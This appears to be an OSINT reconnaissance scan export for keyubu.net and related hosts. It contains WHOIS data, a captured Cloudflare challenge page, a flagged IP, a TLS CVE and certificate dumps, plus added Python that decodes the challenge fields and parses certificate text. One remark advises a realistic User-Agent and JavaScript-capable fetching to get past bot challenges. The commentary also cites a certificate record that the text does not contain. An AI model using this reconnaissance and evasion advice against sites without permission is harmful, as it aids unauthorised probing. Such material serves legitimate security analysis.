TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S. is a domain name registrar accredited by ICANN, the international domain name registration authority.
It has no connection whatsoever with the content or the publication of the web site belonging to this domain name.
It only acts as an intermediary for the registration of the domain name within the framework of ICANN rules.
The information supplied by the owner of this domain name at registration time is as shown above.
NICS Telekomunikasyon A.S. cannot guarantee the accuracy of this information.
For further information you can write to info [at] nicproxy.com.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
| keyubu.net |
| 2023-05-12 03:24:22 | Web Content | No | Web Spider | 2 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5e7988238a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="y6.jA_9kQFy3M6YOg.QQj0I7RDwRq_S0_mJGsO_2b80-1683861862-0-AcgqVWkb5rc1wRzq8CruZzqixRf2dFZvnnpeMqPo3y2RR7Jx_-WXovg8bbE5-sP--_UlGfcV7z4_V2dzBcMQgc0YMGe-kEUsKgbTagVXmpUA4ghc-4PKKMUpkHtuZz1pOKMcK0utLj3hccZMUZnWLxuhkTuTIuQG4o4TSyLTO5DkVUoXElS5eAJBZDveAXcM-BMmbtyiS5OZrdIj-mSAmfLaL706pmvV2Fnl5vtOScBdKynAsN6R2sxLPULzhy1STjWMiZSraZ6Ew2wxtjJHN1h4TKQbcQWPXgeC7N8JO4M701hR33k8KGtSEURoh0GVidfXau0xJ5Jr_OGYkw5FwTBNxUlh_dNr8sS8DOR88UaR5CKeXC5a8lA8uHqsSe_vEPdtQ6ldEQsz8iyhLDK-toyNqpISWEaAU-LNzhQYcTSFycIkBAwjz1zpN5j-awjwVXg6RSi8xKpcwkSr--vTKuOd6x5Ta6zVKvVa1ZDb1BUG5hCEGVVAylLih2TiGym6K9ZGtKfmo5uFC383bpOhjywcXyRzMeHVb0-6rTS3z63iX3ajtvlcxXXHBtT7ZYhauWYn6f0gWo9iG78z0gFNWMboZLU8duYgFtCeIooI5W88WdaOwHui00SnK7AZf-I1NO1RlI5CzrcfcBEcVnBP-f_yBVIgGca2GM5pwr7RuguWROnl62QKlF8-RLW3LA5gZmJXKAJZeG1tfcH7m64xxmCx5ACGWrjrUMscOUmz4eHVBUSovlHfs3fcaIk9rIcxhwwBJRVDZ7oKn49L5lwNMgQFGDH_uzu8lK7M31bKNSdUqZK_4nMd7x2dSJvuX6x1f0d5_OcVPHJZxZ3t19Y2v21qYtJUwk_l3orppRJLdYFyIFSiVGRp27InLA-bNsaoFJuYkaXhMvKIRYQcI57Gu9t5UJBJyHfItWPN13CPHmTRR-xesXCsUCGNSlrn27LW82G3vB0LsnqsDVH9D7CmoXk767loN6MRiMM6E9lV7pktIJEgRREZerErCz-Gw9056q07NCPJYQafcy44fhA0Ayu8GVn0zQYz2hW6ho8NtCxWLxQfDeVyMn6PMsg4IcHVBtGEwWH4OhHGTM9Y96fCik0WwBZwbXdS00HiRtlSReGbhDYPFuGYXFHlUkiHUQ8TNNjJwXP8HrnSnr-Tv6HMk8DT21iZM1t8Ws-Z1VPVHIUqMpqoj6bYoJTKdTHCyWVXSoymcDjiiAr_dGcQ70iCvCfjEHAw9_ZFb11mKAVckSFfHs_OhqOxwVZ8fWFWX5CRVYjb8-2Mg4cL3IvIHLOVh97Eo-8uZhAyESkAuV2iGT1_77CGqcRlglDGfKHj9D0j_GrA2lys8V_W4n84xH9sB9BtW8YrWDnEH4r1lV4ZaxbUDArRwxqP9P1FzSMMjtcVzsgzIRpF2ste2ogtL1ku1f750t7TYDkzGvNZnmSp--sTxTZcyZjvZuT-kxIOnFkQudjV92D0dpRia33x6FdgV44_rvGqDtNVBEvpDVRPc5F7iWJTGkpG_0wSt-t0pHAlpnVj5960VNsQ1fIVqzIjyeTRIupoKny56OID3zofBUX9GXMMvftzuBxkvH568kA-nhoghfb5gJUTU4dQVs3R3lvIMsLJW_0OugCzVwa7bbjSi3yNlNTmyyZSUaQHqMOYwEHt04GQZ_JQBpDCQvIGLq1fOLeArqr97ZPrGgk_x7n2c6MIQK0vFFlSI1sI8OS4yi8D0V-GNr2Bt_G2Ue_TKIZGNfQPaWAM0jGlpc1nPWIZS-sYxW-8ui-6eexGBFZ5-zLr2uaHNG_xNol2Di7iRI4TW5JoZOZTUx2wSZVCmafA5viAw12czMeK4Ymm36GiAo0mTnIrrghObXpHRydCjEOD-ie6KdVTajZGWvZP24dk25nzr
x7uELmxfIPaAvIALx9AdiYBCbeQ0Yz_UH9uDQF6Eh_AqthmXwQQH1F4IA_32McFzcxir6Txr6Mur3t22mOZF963IcNMqvP7vPcccq_rufb25sF8o6nhmaVg8cgPEKIwNeq8Yai0pVnLlllLMVSWIHePNfLuLOdg9LDG1pq1rafu4Rgb-yc2Aoh4enGvHZkuRe6wlOLCDdREAADDoXkFVowEW_DGLxK1pMON0uU78NiTV9_r2o4osZBaOPn8heMmK90xPpnLokgH3gubppwq1gfmaT0RIIPWt7RVKpJRXQ_wSjLVjILALRXQY6PbelUym6TQ1z5fJfHRmrHxVnQvY6aogsFcFGtQVSrl8OCNEwv9P3oaH1GWxoSabHdrSKZmlLs2m-l9LJf4El9FKIA3NBr09u94xMLRSPmEHb4Ol-KPCw5RJiAwyBy2nrohjehlLLjGIgbGh_hTPi8G-yGwVEOyQB8GJBts_O8-g8mz65tw5NpdS_SbFPOasS6txd-b_DzeOnkkcJgqOwM_x3VH39HvzlVBkxqyTu-7yh1ffXA3EAxe-TkXe6foRnX1wH3iJh2_MCDDGxTOkk8Xj59t6wAawmHCKnU2CvogDUE">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13063',
cRay: '7c5f8c5e7988238a',
cHash: 'ba708169066f393',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
m: 'c3pqWAYwgRkhuI1rZgTpwNhg2e/0sRGYZUtHGzVigsI=',
i1: 'NNf66iKUbSi3dpVZsq8TXQ==',
i2: 'dYlWHTj6TB0dDvgfdZy2xA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5e7988238a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| http://ayhu.xyz/ |
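The Web Content record above is not ayhu.xyz's page but Cloudflare's managed-challenge interstitial: the title is "Just a moment...", the matching header record carries `cf-mitigated: challenge`, and the script sets `cType: 'managed'`. Before drawing any conclusion about the site itself it is worth reading the `cRq` object in that script: `ru`, `ra`, `rm` and `t` are plain base64 of the request URL, User-Agent, method and timestamp that Cloudflare saw, while `m`, `i1`, `i2`, `zh`, `uh` and `hh` are base64 of opaque hash-sized values. The Python below is an added example, not SpiderFoot's or Cloudflare's code; it decodes the readable fields from a copy of that block and reports the rest by size only. The `d` entry is left out because the export removed it.

```python
import base64
import re
from datetime import datetime, timezone

# Copied from the "Just a moment..." page above: the cRq block plus a few
# top-level fields of window._cf_chl_opt. The `d` entry is not in the export
# and is therefore not reproduced here.
CHALLENGE_SCRIPT = """
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cRay: '7c5f8c5e7988238a',
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
m: 'c3pqWAYwgRkhuI1rZgTpwNhg2e/0sRGYZUtHGzVigsI=',
i1: 'NNf66iKUbSi3dpVZsq8TXQ==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
}
};
"""

# Matches the single-quoted `key: 'value'` lines used for string fields.
KV_RE = re.compile(r"^\s*(\w+):\s*'([^']*)'", re.M)


def split_challenge_options(script):
    """Return (top_level, crq) dicts of the single-quoted string fields."""
    match = re.search(r"cRq:\s*\{(.*?)\}", script, re.S)
    crq_text = match.group(1) if match else ""
    top = dict(KV_RE.findall(script.replace(crq_text, "")))
    return top, dict(KV_RE.findall(crq_text))


def decode_request_fields(crq):
    """Base64-decode cRq values; keep printable ASCII, summarise the rest as opaque bytes."""
    out = {}
    for key, value in crq.items():
        try:
            raw = base64.b64decode(value, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass: not base64 at all
            out[key] = value
            continue
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            text = None
        if text is not None and text.isprintable():
            out[key] = text
        else:
            out[key] = "<%d opaque bytes>" % len(raw)  # hash-sized, nothing to read here
    return out


def summarise_challenge(script):
    """What the interstitial recorded about the request that triggered it."""
    top, crq = split_challenge_options(script)
    req = decode_request_fields(crq)
    issued = datetime.fromtimestamp(float(req["t"]), tz=timezone.utc)
    return {
        "zone": top.get("cZone"),
        "challenge_type": top.get("cType"),
        "ray_id": top.get("cRay"),
        "requested_url": req.get("ru"),
        "method": req.get("rm"),
        "user_agent": req.get("ra"),
        "issued_at": issued.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "opaque_fields": sorted(k for k, v in req.items() if v.startswith("<")),
    }


if __name__ == "__main__":
    for key, value in summarise_challenge(CHALLENGE_SCRIPT).items():
        print("%-15s %s" % (key, value))
```

Decoding shows the spider presented itself as Firefox 62 on Windows 10, a 2018-era User-Agent string, and that the challenge was issued at 03:24:22Z, the same second as the record's Date Found. A stale UA with no JavaScript execution is exactly what bot management scores on, so every Cloudflare-fronted host in this scan will return the same interstitial unless the crawl is run with a realistic UA and a JS-capable fetch; treat any "Web Content" record whose header twin carries `cf-mitigated: challenge` as "no content retrieved", not as the site's page.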
| 2023-05-12 02:44:11 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:45:32 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [104.21.6.166]
| 104.21.6.166 |
| 2023-05-12 03:05:12 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | fluid.battleb0t.xyz |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.33): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00ty.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://oldfluid.battleb0t.xyz/dat.gui.min.js | https://oldfluid.battleb0t.xyz/ |
| 2023-05-12 02:52:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 27 02:46:47.420 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5E:6B:E1:80:95:E9:06:B9:64:A1:6D:DC:
F7:46:19:D7:44:B3:41:56:D0:CD:B2:17:79:5E:38:01:
98:82:42:B4:02:21:00:BB:82:4F:AE:81:BB:9F:FF:F6:
F5:EC:BC:04:24:9F:54:06:50:1B:72:28:CB:B2:D2:B9:
F3:82:3C:FB:08:50:07
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:47.434 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:DB:34:C7:60:1E:A0:7B:B4:93:B7:C3:
6F:79:DF:2B:2D:A1:07:F6:E0:3C:66:9E:DB:AB:71:DF:
C8:12:FA:43:40:02:20:40:0C:EE:4D:C0:C7:6C:61:B4:
C4:4E:15:E2:3B:37:04:6C:A3:AE:DB:A8:2D:9F:6D:D1:
44:F8:EF:BB:53:2D:AA
Signature Algorithm: sha256WithRSAEncryption
2d:0d:59:11:7e:bd:11:7c:f4:13:c8:d6:c5:40:47:7f:c1:17:
f8:18:85:ad:f5:ee:eb:ca:33:40:d0:80:8a:a2:5e:d9:cb:36:
84:5e:8f:ea:da:80:c0:0f:bc:fb:ed:5d:aa:90:c6:8d:e2:e0:
93:88:ba:dd:b6:40:89:0d:e9:1c:2b:f7:10:55:11:ed:5f:b4:
fb:fb:56:28:a1:cf:a8:59:b5:c5:78:e9:54:8e:06:d9:23:af:
f2:43:7d:64:52:f1:26:ea:4f:5e:ca:47:af:10:86:bc:07:b5:
f9:72:9d:08:e5:af:f4:89:55:6c:58:05:70:62:87:bc:37:3c:
b1:7c:29:a6:06:1e:b5:a4:e0:40:13:6d:69:d7:73:91:80:75:
18:3c:5b:0a:7c:a4:ff:05:c7:98:e1:97:78:96:31:ea:08:08:
4a:40:e6:a1:dd:b4:58:50:6f:80:e3:70:72:18:89:1b:9e:32:
1a:ca:dd:a2:a8:e9:74:eb:2c:c4:a6:1c:b7:31:48:b6:e4:67:
9b:a7:9c:a6:df:cd:82:95:8c:31:83:cd:c7:0e:e3:d2:a3:19:
06:a0:13:7b:a7:11:2c:dd:85:53:7f:ff:2c:0f:11:cf:5d:a7:
fb:7d:2f:9b:4b:7a:3e:55:04:0b:72:4a:13:4f:26:99:3b:63:
24:f8:e3:2a
| battleb0t.xyz |
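The two Certificate Transparency records in this section (panel.battleb0t.xyz above, fluid.battleb0t.xyz here) are both `openssl x509 -text` dumps, and they differ in one security-relevant way: the first carries the critical CT Precertificate Poison extension, so it is the precertificate submitted to the logs and is never served by a TLS endpoint, while the second is the final certificate with two embedded SCTs. Neither says what the host serves today; this one expired on 27 Mar 2023, 46 days before the scan. The Python below is an added example, not SpiderFoot's code: it parses the fields needed for that judgement out of the text form shown in the export (indentation stripped, as the export strips it) and classifies each record against the record's own Date Found timestamp.

```python
from datetime import datetime, timezone

# Condensed copies of the two CT records in this scan, with leading indentation
# dropped exactly as the export drops it. Modulus and signature bytes are
# omitted because the parser never reads them.
FLUID_CERT_TEXT = """\
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Timestamp : Dec 27 02:46:47.420 2022 GMT
Signed Certificate Timestamp:
Version : v1 (0x0)
Timestamp : Dec 27 02:46:47.434 2022 GMT
"""

# The panel.battleb0t.xyz record only shows its extension block in this section,
# so Subject and Validity are absent; the parser has to cope with that.
PANEL_PRECERT_TEXT = """\
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
CT Precertificate Poison: critical
NULL
"""

# "Date Found" of the fluid.battleb0t.xyz record.
SCAN_TIME = datetime(2023, 5, 12, 2, 52, 56, tzinfo=timezone.utc)


def _parse_openssl_time(value):
    # openssl prints "Dec 27 01:46:47 2022 GMT"; single-digit days get two spaces,
    # which strptime tolerates because a space in the format matches any run of whitespace.
    return datetime.strptime(value.strip(), "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Extract the fields an analyst needs from `openssl x509 -text` style output."""
    info = {"serial": None, "issuer": None, "subject": None, "not_before": None,
            "not_after": None, "sans": [], "precert_poison": False, "sct_count": 0}
    lines = [ln.strip() for ln in text.splitlines()]
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if line.startswith("Serial Number:"):
            # Long serials wrap onto the next line; short ones stay inline as "1234 (0x4d2)".
            inline = line.split(":", 1)[1].strip()
            info["serial"] = inline.split(" ")[0] if inline else nxt
        elif line.startswith("Issuer:"):
            info["issuer"] = line.split(":", 1)[1].strip()
        elif line.startswith("Subject:"):  # not "Subject Public Key Info:"
            info["subject"] = line.split(":", 1)[1].strip()
        elif line.startswith("Not Before"):
            info["not_before"] = _parse_openssl_time(line.split(":", 1)[1])
        elif line.startswith("Not After"):
            info["not_after"] = _parse_openssl_time(line.split(":", 1)[1])
        elif line.startswith("X509v3 Subject Alternative Name"):
            info["sans"] = [e.strip()[4:] for e in nxt.split(",") if e.strip().startswith("DNS:")]
        elif line.startswith("CT Precertificate Poison"):
            info["precert_poison"] = True  # RFC 6962 poison: a precert, never served by a TLS server
        elif line.startswith("Signed Certificate Timestamp:"):
            info["sct_count"] += 1
    return info


def assess(info, scan_time=SCAN_TIME):
    """Classify a CT record the way a reader of this scan should."""
    kind = "precertificate" if info["precert_poison"] else "certificate"
    if info["not_after"] is None or info["not_before"] is None:
        status = "validity unknown"
    elif scan_time > info["not_after"]:
        status = "expired %d days before scan" % (scan_time - info["not_after"]).days
    elif scan_time < info["not_before"]:
        status = "not yet valid at scan time"
    else:
        status = "valid at scan time"
    return {"kind": kind, "status": status, "sans": info["sans"],
            "sct_count": info["sct_count"], "issuer": info["issuer"]}


if __name__ == "__main__":
    for name, text in (("fluid", FLUID_CERT_TEXT), ("panel", PANEL_PRECERT_TEXT)):
        print(name, assess(parse_cert_text(text)))
```

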